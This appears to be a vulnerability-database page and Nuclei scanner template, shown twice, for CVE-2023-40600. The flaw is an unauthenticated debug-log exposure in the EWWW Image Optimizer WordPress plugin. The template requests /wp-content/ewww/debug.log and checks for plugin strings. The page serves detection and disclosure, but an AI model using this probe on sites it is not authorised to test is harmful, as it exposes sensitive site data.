EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure

CVE-2023-40600

Verified

Description

The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debug_log function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled.

Severity

Medium

Published Date

February 16, 2026

Template Author

shivam kamboj

CVE-2023-40600.yaml

id: CVE-2023-40600

info:
  name: EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure
  author: Shivam Kamboj
  severity: medium
  description: |
    The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debug_log function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled.
  impact:
    Attackers can access sensitive embedded data, potentially leading to information disclosure and further exploitation.
  remediation:
    Remove debug information and update to the latest version of EWWW Image Optimizer.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40600
    - https://patchstack.com/database/wordpress/plugin/ewww-image-optimizer/vulnerability/wordpress-ewww-image-optimizer-plugin-7-2-0-sensitive-data-exposure-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer/ewww-image-optimizer-720-unauthenticated-sensitive-information-exposure-via-debug-log
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wp,wordpress,wp-plugin,ewww-image-optimizer,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/ewww/debug.log"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "ewww_image_optimizer","__construct()")'
        condition: and
# digest: 4a0a00473045022100f081fe88954782b22420244733720ec76bcc72f13270afb18b397dee6a651107022044105d9849b1cc36e727f665e911f62b0cb62e96c74e400c24eee8518e28f89e:922c64590222798bb761d5b6d8e72950

5.0Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2023-40600 https://patchstack.com/database/wordpress/plugin/ewww-image-optimizer/vulnerability/wordpress-ewww-image-optimizer-plugin-7-2-0-sensitive-data-exposure-vulnerability https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer/ewww-image-optimizer-720-unauthenticated-sensitive-information-exposure-via-debug-log

Remediation Steps

Remove debug information and update to the latest version of EWWW Image Optimizer.

id: CVE-2023-40600

info:
  name: EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure
  author: Shivam Kamboj
  severity: medium
  description: |
    The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debug_log function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled.
  impact:
    Attackers can access sensitive embedded data, potentially leading to information disclosure and further exploitation.
  remediation:
    Remove debug information and update to the latest version of EWWW Image Optimizer.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40600
    - https://patchstack.com/database/wordpress/plugin/ewww-image-optimizer/vulnerability/wordpress-ewww-image-optimizer-plugin-7-2-0-sensitive-data-exposure-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer/ewww-image-optimizer-720-unauthenticated-sensitive-information-exposure-via-debug-log
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wp,wordpress,wp-plugin,ewww-image-optimizer,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/ewww/debug.log"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "ewww_image_optimizer","__construct()")'
        condition: and
# digest: 4a0a00473045022100f081fe88954782b22420244733720ec76bcc72f13270afb18b397dee6a651107022044105d9849b1cc36e727f665e911f62b0cb62e96c74e400c24eee8518e28f89e:922c64590222798bb761d5b6d8e72950

EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps